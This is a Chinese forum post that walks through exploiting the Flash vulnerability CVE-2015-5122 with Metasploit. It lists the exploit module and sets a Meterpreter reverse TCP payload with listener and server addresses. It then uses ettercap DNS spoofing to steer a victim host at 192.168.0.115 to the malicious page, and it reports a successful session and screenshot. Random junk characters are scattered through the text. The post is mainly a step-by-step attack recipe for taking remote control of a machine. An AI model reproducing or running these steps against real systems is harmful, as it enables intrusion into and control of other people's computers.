cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

4 _7 j s- i* C6 p% g 二、cve2015-5122漏洞实例演示虚拟机 # _) {. v u2 [

7 r! ^0 b+ w$ [3 f+ c( g 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 9 v" R+ n; s$ l5 V

- W* j; a: F5 }8 K7 }: K search cve-2015-5122如图： ) [+ k4 a/ g9 E! E! p; i$ u6 g0 s

# `# Y( m1 b! Z ~+ x3 r* w , P! g* H N5 K

) M/ ^: S% Z% H% B5 c 下面我们敲如下命令： - i$ f2 v# q9 t+ T9 s4 a8 D9 J; f

8 A9 J2 c! @ }6 o. Y* n/ _9 W( K5 q use exploit/multi/browser/adobe_flash_opaque_background_uaf O% k1 Z7 p- R

* S% c; i( `3 a, l; R) C. S set PAYLOAD windows/meterpreter/reverse_tcp 3 @/ Y/ e' X% I0 C! b; p! e

" @, l: d- Y. i* z* D set LHOST 192.168.0.109 . ?* Q; N! _( z2 S8 J% T

2 o' |4 u1 P" a set URIPATH / /*根目录*/ / P- f5 S! n% Q

( z+ G/ }5 q4 \# X5 v set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 % W; \8 G) t2 l

# Q. }0 ^3 g: F0 F& `) u0 r set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ! q1 f: n/ Q1 S+ v

- N1 w0 v" i2 _6 m8 N 然后show options如图： . D: x2 m' e6 L& q9 F" t2 m

; E, t7 P: E8 D5 l& I9 s5 [7 ]) Q ( @. n k6 B" b

O. |1 Y+ w/ X 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
V& A+ E6 f s4 B! l * H: P4 T' f& a9 A; P, R

3 A) T T3 ~7 \- \ 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 & ?3 N% ~* C4 A9 a. Q% l: W

1 S& @* y4 H) V: O Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 4 C: s+ `7 |# i# {6 G

4 V* r9 z5 {8 `- q( e' y 9 _+ f% }+ @& ?+ D

* y1 `! m; N/ a6 ] 成功了，这时候我们断开ettercap，如图： ; q' @) ^( i( w" m {6 x

z2 G; t9 \7 M+ P8 H9 \; [ ' h: w$ b' t; Y- T, W

" T7 i# s0 o3 k Screenshot如图： ) Q D' j% |. q( T8 K

3 |+ I& M7 G5 w- Z * B( `8 _# f2 w

" P# e/ C$ G3 ]6 P: m* |* e" s 5 x7 u6 v j' z# @0 I$ n" w

		自动登录	找回密码
密码			立即注册